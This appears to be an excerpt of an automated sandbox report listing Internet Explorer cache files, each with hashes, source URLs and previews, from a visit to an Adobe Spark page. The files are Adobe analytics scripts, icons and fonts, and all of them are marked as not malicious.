                                                                                                                                                                                                                                                        Size (bytes):2503
                                                                                                                                                                                                                                                        Entropy (8bit):5.2572417759398045
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:15Zn9KNNFeHD7Bbg8m9wPjwPbeffSQLYno4BXo5iTJWN+BJ6Nu4CuMgG+/T1zcwo:1TneNFeHDNbg76s6nSjXSiTJWMBJ6kZ1
                                                                                                                                                                                                                                                        MD5:103F74C606F9F34DE57CC58D03CA9F37
                                                                                                                                                                                                                                                        SHA1:99371402EBAC0BE88C47272395B7D8642355C451
                                                                                                                                                                                                                                                        SHA-256:1F1D00E1E54603EB529B61F2492746AD37BDFD32219940DDDB0D67A77A3A4401
                                                                                                                                                                                                                                                        SHA-512:0C0309CF0B57476F3D03396E0FA0CBEE8927CFDE1EACAAAF78BA1E7C9688C03ECCE203D3295F7D435EE017591CF1440068BDDCC1D5A3D094C4E2DB5CB0ED6F5A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC6f46e43fa6d44dbeb45cc5801ffded0e-file.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC6f46e43fa6d44dbeb45cc5801ffded0e-file.js`..function searchAsYouType(){function g(e){for(var t=1,a=document.body.previousElementSibling?"previousElementSibling":"previousSibling";e==e[a];)++t;return t}function c(e,t,a){for(var n=a.toLowerCase(),r=0;e&&e.parentNode;){if(e=e.parentNode,r++,"tagName"===t&&e.tagName.toLowerCase()==n)return e;if("id"===t){if(e.id.toLowerCase()==n)return e}else if("className"===t){if(5<=r)return null;if(e.className.toLowerCase()==n)return e}}return null}document.getElementsByClassName("Gnav-menu-content").length&&document.getElementsByClassName("Gnav-menu-content")[0].addEventListener("click",function(e){var t;if(e.target&&("A"==e.target.nodeName||"SPAN"==e.target.nodeName||"IMG"==e.target.nodeName)){var a=e.target.className.split(" ");if(a)for(var n=0;n<a.length;n++){if(-1!==a[n].indexOf("SAYT-")&&-1===a[n].indexOf("SAYT-advancedSearch"))if(c(e.target,"id","
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RC881683c91a4d4caaa3e05264c5d96242-file.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1110
                                                                                                                                                                                                                                                        Entropy (8bit):5.041086303307307
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:15ewldaAVgvf2IvPJ9GaifsT3MdkpuH4R9pQFE7Ath:15eUdhiOIvPJ9GRw34YR8l
                                                                                                                                                                                                                                                        MD5:40C9BAD10FAEA7C23A900A7D42C39F05
                                                                                                                                                                                                                                                        SHA1:6F7CF0B00B2154B8339E57490F35D6CEEF2922DC
                                                                                                                                                                                                                                                        SHA-256:CD38D21155B241E116C5916D9B01D575932986798A8BAE913CE78F05B976DF31
                                                                                                                                                                                                                                                        SHA-512:90B31FFF8366E68623202D1719B98DED2CB04DA39FA4F148CFD397B773005349DAF11E680FADF352E59D5FA3B909E27925A3A44B05E173FEB0D1B3193F4BFB7A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC881683c91a4d4caaa3e05264c5d96242-file.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC881683c91a4d4caaa3e05264c5d96242-file.js`..var _sat=_satellite,h=_sat.host,path=_sat.path,index=_sat._index,dataElementName="digitalData.organization.dnb";if("www.adobe-students.com"==h||"www.substance3d.com"==h||"labs.adobe.com"==h||"magazine.substance3d.com"==h||index(h,"photoshop.com")||"stockenterprise.adobe.com"==h||"pages.adobe.com"==h||"experience-makers-international.adobe.com"==h||"trainingpartners.adobe.com"==h||index(h,".adobeevents.com")||"colour.adobe.com"==h||"adobehiddentreasures.com"==h||"www.adobeexperienceawards.com"==h||index(h,"acrobat.adobe.com")||index(h,"esign.adobe.com")||index(path,"/experience-cloud")||index(path,"/events/")||index(h,"magento.com")||index(h,"marketo.com")||"futureisyours.adobe.com"==h||"api.spark.adobe.com"==h){var dnbScript=document.createElement("script");dnbScript.src="https://ade0164.d41.co/sync/",dnbScript.type="text/javascript",dnbScript
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RC89c6d3bd15f043db95a5a0a4b5cc9da0-file.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):821
                                                                                                                                                                                                                                                        Entropy (8bit):5.166556112101963
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:jvgeASPRZfgXfcSfUuW5y6Z8KEp8MnbtL8re4yifdfddfdfdALCI/LZSqlhUeAdp:15ocSMueyrpjBKe4llldllALxTb0aVM/
                                                                                                                                                                                                                                                        MD5:76575E06306C243D0DA748226C412465
                                                                                                                                                                                                                                                        SHA1:F6A56A10995B517CA168AFC262BDD107603593AE
                                                                                                                                                                                                                                                        SHA-256:89B268AD62AF00A9016A288026AF84CFC7676F5204331E0FF83A3D6F5688EB98
                                                                                                                                                                                                                                                        SHA-512:FDA5CD3D596B136544082123BD12F51E5E70B475D04ED0473D86CEFA1ACE974D926A311815E672E65CF96219F097ECCC96243D0C0A02D75F8263F84106336FE0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC89c6d3bd15f043db95a5a0a4b5cc9da0-file.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RC89c6d3bd15f043db95a5a0a4b5cc9da0-file.js`..!function(){function u(e){var a=1e13*(Math.random()+""),n=document.createElement("iframe");n.style.display="none",n.style.width="1",n.style.height="1",n.src=e+a+"?",document.body.appendChild(n)}var d=window;window.marketingTagInfo=[],_satellite.windowProperty=function(e,a,n){var r=d.location,t=r.hostname,c=r.pathname,s=unescape(unescape(unescape(r.href))),i=unescape(unescape(unescape(document.referrer))),o="";switch(e){case"host":o=t;break;case"path":o=c;break;case"href":o=s;break;case"referrer":o=i;break;case"dClick":u(a);break;case"substr":o=function(e,a){return-1!==e.indexOf(a)}(a,n);break;case"addPixel":marketingTagInfo.push(a);break;default:return!1}return o}}();
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RCa8534599c5d1425b9b1fceaf046699bf-source.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):830
                                                                                                                                                                                                                                                        Entropy (8bit):5.144479495488463
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:15jzct/Bw5jHJj2lBfJKnKD8cQcj+D+NplHln:15st/Bw5L52lBfi63Kqzpt
                                                                                                                                                                                                                                                        MD5:A468404B5E53FA4A8F6E26CC11D508D4
                                                                                                                                                                                                                                                        SHA1:EC691D97B30A5A07D5EA977B904F77C311B5A4C0
                                                                                                                                                                                                                                                        SHA-256:F3AE23D72EB26BE500F273BD2824D8504B7144E136D76D0C2D73CE2E4809537B
                                                                                                                                                                                                                                                        SHA-512:F4CCD6704922BCF4F63E6DE11771A5468A631A6A8A4D90B9B7203B9AB820BCE849F4B22209425A4C68809F54A65B797EB2DFE138FBF13DF160F38C55A8318B76
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RCa8534599c5d1425b9b1fceaf046699bf-source.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RCa8534599c5d1425b9b1fceaf046699bf-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RCa8534599c5d1425b9b1fceaf046699bf-source.min.js', "_satellite.getVar(\"digitalData.organization.demandbase\").then(function(e){_satellite.setVar(\"aep_demandbase\",e),_satellite.getVar(\"digitalData.primaryUser.primaryProfile.profileInfo\").then(function(){_satellite._promises&&_satellite._promises[\"digitalData.primaryEvent.eventInfo.interaction.impression\"]?_satellite._promises[\"digitalData.primaryEvent.eventInfo.interaction.impression\"].then(function(e){digitalData._set(\"digitalData.aep.impression\",e),_satellite.track(\"pageview\")}):_satellite.track(\"pageview\")})});");
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RCbb47518ad08d43699044c6ef46f39ebb-file.min[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):3900
                                                                                                                                                                                                                                                        Entropy (8bit):5.237581285744696
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:1fW5nV9Nz6pCvYsDg1dS0N2Q3Zrr6SZsRAVVnCV:WV9t46Lk1d1gQ3ZrmwsRAVVn0
                                                                                                                                                                                                                                                        MD5:D17255012C56773DFFA4EFE62F62EA75
                                                                                                                                                                                                                                                        SHA1:AB2B02DE59551F70F263B99240871ADE925A329A
                                                                                                                                                                                                                                                        SHA-256:1B696886FB32738D3EB874FC5789084BB433039CEDF1D2519F15E1B2AC1A7421
                                                                                                                                                                                                                                                        SHA-512:B662BBB2645B0C73A410FB8BFD4DCD3BD67D05B971A4804CE08E0C17EBB63CB9A2DCFBE53C4CC887E5AB61F924B17A4DDC7D49CBDFB4A4F7597C0A508D2C69BD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RCbb47518ad08d43699044c6ef46f39ebb-file.min.js
                                                                                                                                                                                                                                                        Preview: // For license information, see `https://assets.adobedtm.com/d4d114c60e50/f3fbfbe0e7ca/f496fb7b47d7/RCbb47518ad08d43699044c6ef46f39ebb-file.js`..window._sophiaLoadedPromise=new Promise(function(e){var I=window.adobeIMS,h=h||function(i){function e(){return window.console&&window.console.log&&window.console.error}var n,o="[Sophia]",t=function(){},a="head",s={ActionId:"",CampaignId:"",ContainerId:"",ControlGroupId:"",TreatmentId:"",VariationId:"",CardId:"",SurfaceId:""},c=function(n,o,e){var t=performance.now(),a=new XMLHttpRequest;a.onreadystatechange=function(){if(a.readyState==XMLHttpRequest.DONE){var e=performance.now();w.log("Total time taken for fetching response for: ",n,e-t," milliseconds."),o(a)}},a.open("GET",n,!0),e&&e.forEach(function(e){a.setRequestHeader(e.key,e.val)}),w.log("Sending request: ",n),a.send()},r=function(e){var n=document.implementation.createHTMLDocument();return n.body.innerHTML=e,n},d=function(e){w.log("Got response: "+e);var n=document.querySelectorAll(h.co
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SPRK_color_v2@2x[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1934
                                                                                                                                                                                                                                                        Entropy (8bit):4.543427398694442
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Ci1LbWxBa8zBtKJwzWOxCKWZDPzKiODCTCZ:Zh6Ba8zbK6X3WVP2DCTCZ
                                                                                                                                                                                                                                                        MD5:F858A5C4E786F511FABE5D35DA995F65
                                                                                                                                                                                                                                                        SHA1:DFC968D018C16B8E4853AA17418C9F4302CADC6C
                                                                                                                                                                                                                                                        SHA-256:CDA6CA3F0B46DB2E50DDB33DC50438CC2D1C22CF71650CD457912BDD9718A6EF
                                                                                                                                                                                                                                                        SHA-512:ADE9CE8069690298C4A2CDE1FE1D066B8FA2D60DDD2A43177A7ADE92A648C349A05236D2C1C6EBA1A821A620E803FA68EE9FECD777FCD3CB37F961A97F6F4219
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/SPRK_color_v2@2x.svg
                                                                                                                                                                                                                                                        Preview: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 56 54"><defs><style>.cls-2{fill:#fa0f00}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Surfaces"><g id="Spark_Surface" data-name="Spark Surface"><rect width="56" height="54" rx="9.91" fill="#370000" id="Outline_no_shadow" data-name="Outline no shadow"/></g></g><g id="Outlined_Mnemonics_Logos" data-name="Outlined Mnemonics &amp; Logos"><g id="Sp"><path class="cls-2" d="M18.05 38.37A18.68 18.68 0 0114.3 38a12.08 12.08 0 01-2.83-.91c-.2-.09-.3-.3-.3-.62v-4.12a.22.22 0 01.09-.2.25.25 0 01.25 0 11.84 11.84 0 003.29 1.17 12.74 12.74 0 003.4.48 5.28 5.28 0 003-.65 1.91 1.91 0 00.9-1.61 2.13 2.13 0 00-.29-1.12 3.1 3.1 0 00-1-1 11.61 11.61 0 00-2-1l-1.85-.78a13.89 13.89 0 01-3.54-2.05 6 6 0 01-1.75-2.35 7.53 7.53 0 01-.49-2.7 6.64 6.64 0 014-6.2 11.25 11.25 0 014.89-1 22.84 22.84 0 013.31.23 7.22 7.22 0 012.39.71.52.52 0 01.26.48v3.89c0 .05 0 .1-.1.16s-.14.06-.24 0a9.9 9.9 0 00-2.5-.65 14.11 14.11 0 00-3.19-.25 7.28 7.28 0 00-1.81.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\arrow-left[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 18 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):446
                                                                                                                                                                                                                                                        Entropy (8bit):7.08048723282186
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPzQynDi3URTCMkLPNsidohbJPxNfh9JL4zCh7BnhxCNjep9sEI0AEGdipxd:6v/7MM9CXNsiqRl5L4IrxeeDsELH7rN
                                                                                                                                                                                                                                                        MD5:59F99801C29B6F884941AB4E86435815
                                                                                                                                                                                                                                                        SHA1:D434AF60CC81A5813EB3084AEF70B0CB97E6ED54
                                                                                                                                                                                                                                                        SHA-256:50E89F67220A83D59B25E9EC977F059AEDE2C1499D401A6331219249F0C54CC3
                                                                                                                                                                                                                                                        SHA-512:70F6CDAA488B259CD53F21C4A2253DF3DCBEBC0071D1687FC1E351B169EC0BF8CDC391FB6230A867C0C0F578D2688A75739E1CD59EBC3843B83480F7D8574004
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/images/arrow-left.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR.............<.~.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.9/11/13.9I.....IDAT8...k.@...'$..P....PR...1...._.]Yy.r2r:1.....#0..D...P..h.i.../.........0.\'.!.=........&.y.+.Cc...5.PHDq3$....*..T.g!.E...q..B......i....eY.n.....9/u..........m.. ..:...g..q...n.\...`Q..6M#|...&}].e...ns..Q....x..]fI.......0...Q.u[..L..7...}...EQ|..;....%.t.....,..........IEND.B`.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\arrow-right[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 18 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):442
                                                                                                                                                                                                                                                        Entropy (8bit):7.029622930176089
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPzQynDi3URTCMkLPJsbjShtfGQHVxFX0o/A5VFnWMFd4+0hS+qz58OCox5Z:6v/7MM9CXJsbcf1xFXoWkOhSVNB7Z
                                                                                                                                                                                                                                                        MD5:28A18EE67AF8D721211ED08164E72CB9
                                                                                                                                                                                                                                                        SHA1:C643A55A18EF870B88FA1CAFED098A12F001384F
                                                                                                                                                                                                                                                        SHA-256:78260D8829368E46D58D02B613EC0C0E19AEE5C159AA4BA255D032D283C30187
                                                                                                                                                                                                                                                        SHA-512:FF21CE7DEE9E5B298BEFD0B67869A4E582097712B0A8D23E10050DFC60BD4B7BD26B0EA077865AA0D6FF57E204A74187874572B243584220C7B23FB0CC127F52
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/images/arrow-right.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR.............<.~.....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.9/11/13.9I.....IDAT8...!o.@.....d?.....#L...BW..\..\.YP....@T.\..>..{;...e.....I....q.dDrGr..#....w".].2k|.. ..)......F..@.us!.=..........H..L.s).7..".]...Ug.u.W..;..,HD.EQ..2....!..1....<.X....9M.w.".</d..x.pk.......$.Uqw..&....VEdW8A..[...{4.UU.h ..._. ...^)u....b.Z....8..W..."..).&\....IEND.B`.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\browser-icon-chrome[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 124 x 124, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13144
                                                                                                                                                                                                                                                        Entropy (8bit):7.963791073584651
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:4ivh6I4qElF6xzdN0SGd6GsRZj1Xcul1/tOP:XvhNfDxzdN4aRrc0lEP
                                                                                                                                                                                                                                                        MD5:5CE8BC0C54510B727656B9750F4F4B37
                                                                                                                                                                                                                                                        SHA1:CFB13C4F64CE267C2A2A67B6EA3076A86308665E
                                                                                                                                                                                                                                                        SHA-256:71D9139914C20E72E574633CCD31802FEA9130050AF514736E2B6127061A46D0
                                                                                                                                                                                                                                                        SHA-512:9F442960D180D6C11F2341C2D483D19D977F41D36B6CC6D370F9B7C6F472EE216452B96D6F36D4A6621AF6BC53A6291596942A3C11F62A86EB9676E338F6A038
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/landing/browser-icon-chrome.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...|...|............tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Macintosh)" xmpMM:InstanceID="xmp.iid:87E117A00FF011E69AFE8E50F5F6CE89" xmpMM:DocumentID="xmp.did:87E117A10FF011E69AFE8E50F5F6CE89"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:87E1179E0FF011E69AFE8E50F5F6CE89" stRef:documentID="xmp.did:87E1179F0FF011E69AFE8E50F5F6CE89"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.9..../.IDATx..}..\U....{.o.nv...J*...E).."<..Q?..Q...RT......[D.U.*.......P..{.n.u......2wfgvggfw..L>...s..{
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\d[1]
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:Web Open Font Format, TrueType, length 33188, version 0.0
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):33188
                                                                                                                                                                                                                                                        Entropy (8bit):7.983177376379406
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:wGSOatUd5GncZIdLNrOAumby3gbvrHaebJVNXQ8V:wBJm0cZsBOXyrbba8V
                                                                                                                                                                                                                                                        MD5:DCA4F55F778D14EC5C839B53B11329ED
                                                                                                                                                                                                                                                        SHA1:A467C967D419B74EFC0FE8142B4399E3B3BBB083
                                                                                                                                                                                                                                                        SHA-256:AF901B92645CD64D10F4AC5059A9C94F6AABED7295425C03694B8C0FC5126655
                                                                                                                                                                                                                                                        SHA-512:D5A116A469C8C40AC2630BBAB5B8A7ECFB34C9C704396A403BAE29F5579484E70D3E735872F84DC7ADFB4CC7BA8407A91EB4F5B99D78B2073E2B5B2FFB3A6D5E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://use.typekit.net/af/d5d9b2/00000000000000000000ffd9/26/d?subset_id=2&fvd=i3&v=3
                                                                                                                                                                                                                                                        Preview: wOFF..............%<........................DYNA................GDYN...|.......I..J.GPOS.......j....C.W.LTSH.......p....APzOS/2.......X...`o.nAVDMX.......|....i.qMcmap...........x;.=.cvt ...$...8...8.#..fpgm...\.......s.Y.7glyf...t..\O......q.hdmx..n........(.J.head...`...6...6....hhea...H.......$.s..hmtx..y|...*...xj ..loca..{....a...|.d,.maxp...h... ... ...~name.............|.post..~........PV...prep...t...|.....Tx.x...C`...D..]m.m.m.m.i...6I.4.m..y.,..,...d....Hn$'..%.)dJR.T..?zS.4.iIc.IGZ..t2...... 3.Qf&..Bf.IV..ld...f?...2.9.;..).K.%..G..F~......o_)D.Y.......E..QX...,AQ.LI..R...)a.(CIY.R....#.)#+PVVt.D9.@e..*T.U.h.F%Y...UdM..;jQM...C.{K]j.z...eoh@m.:..uec..k.P_6..lFC{Es...4.-ib/i......d[.....B....@+{NGZ.N...ik..B;.....dw...t.=.${......]e_..c..]....@O9.^..A........2..r...p.......d... 9...........f..g...8..r.#-...S.-.2...X9.qr..-..L...(g3I....d9.)r>S-..L.....1...r...Rf.e..,g.\.<.R.a...j..5,...H.c.\.......F..M,..YaQla...Ur;..6;X#w.V.b..b7...6.l.H..I.g.<.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\en-US_bundle-6a358124[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):235217
                                                                                                                                                                                                                                                        Entropy (8bit):4.8518374779735876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:/I5YuM8uKFnWwO0Pg2ZCtndCR+GuA1qXEQ0H4NF4+rDhMLo4RwKsHW0UU:/UYu1Pg2ZCtndCYGqEQ0H4NF4+G/qUU
                                                                                                                                                                                                                                                        MD5:EA3FD08216A1913E940A7061B28286D2
                                                                                                                                                                                                                                                        SHA1:FD656FE57F2637DAA1768EAAB9419A9DD5ABAB7D
                                                                                                                                                                                                                                                        SHA-256:FDDA778927A94939339B8FE7B9AFCFCBCF952FA561BD1076115719364E4CC596
                                                                                                                                                                                                                                                        SHA-512:0CD8CD193A996CBE91B8A95C2C32B74310723E445686102DCC784C5FFE30A8496F718CEFA44E4033263989A14C7C45A6D4AD8D3397A3FBE67B9330ECE5E0466A
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/static/locales/en-US_bundle-6a358124.js
                                                                                                                                                                                                                                                        Preview: var localeBundle=function(e){var a={};function t(r){if(a[r])return a[r].exports;var o=a[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}return t.m=e,t.c=a,t.d=function(e,a,r){t.o(e,a)||Object.defineProperty(e,a,{enumerable:!0,get:r})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,a){if(1&a&&(e=t(e)),8&a)return e;if(4&a&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&a&&"string"!=typeof e)for(var o in e)t.d(r,o,function(a){return e[a]}.bind(null,o));return r},t.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(a,"a",a),a},t.o=function(e,a){return Object.prototype.hasOwnProperty.call(e,a)},t.p="",t(t.s=10)}({10:function(e,a,t){e.exports={data:t(11),strings:t(12)}},11:func
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\favicon[1].ico
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:MS Windows icon resource - 1 icon, 48x48, 32 bits/pixel
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9662
                                                                                                                                                                                                                                                        Entropy (8bit):1.5933577223587498
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:97gzdbklTMl1sy6TMenl7ulGt/3GmjAAp:970sI2NmU3GY
                                                                                                                                                                                                                                                        MD5:B28BF60DD7E50B6DFFD394EBC0F9057A
                                                                                                                                                                                                                                                        SHA1:9EA7EED87B689757780322989EF426AEFFDC8F7A
                                                                                                                                                                                                                                                        SHA-256:BF24C9E4D37F94D4BD2F870228FF421CA54B2949DB3391DBD3818EC0E6DB0F5F
                                                                                                                                                                                                                                                        SHA-512:B16A7F756E38FFE4BBCC0394A6E41593CC9FE68AACA6350C1C20D10E7A284EBFC7937C15726D0F43A3ABD7C43D128A041A109CAC2C8F240707FE1997E633E025
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/favicon.ico
                                                                                                                                                                                                                                                        Preview: ......00.... ..%......(...0...`..... ......$.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................A...........................................................................................................V...............................'...............................................A..........................................................................................................................................................................
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\icon-footer-instagram-grey[1].svg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1970
                                                                                                                                                                                                                                                        Entropy (8bit):4.761536310074538
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:cOAvf3vrBSH7QZRYaHYZ/wPtI6Z0/YJCnAwuHm6:Evf/rOyRYagYPf0/km0
                                                                                                                                                                                                                                                        MD5:3AA1FDA78E24D8147732E483AB53D82C
                                                                                                                                                                                                                                                        SHA1:2F68DEC16E343C8F97E8838A2A97D60C071F531E
                                                                                                                                                                                                                                                        SHA-256:FA7FAE8A66DF78B001F3B9DD2BEF5913638614D202E256E9513034DB6B26ED58
                                                                                                                                                                                                                                                        SHA-512:57BECD76540E1FDE0FBD0923459BDAEF1260D2494D33329B944B021331D6511D828F9844DD07AB946F042A0239FF5D9E7DC77896BEFADAE4A81A301AFB9E67C3
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/images/icon-footer-instagram-grey.svg
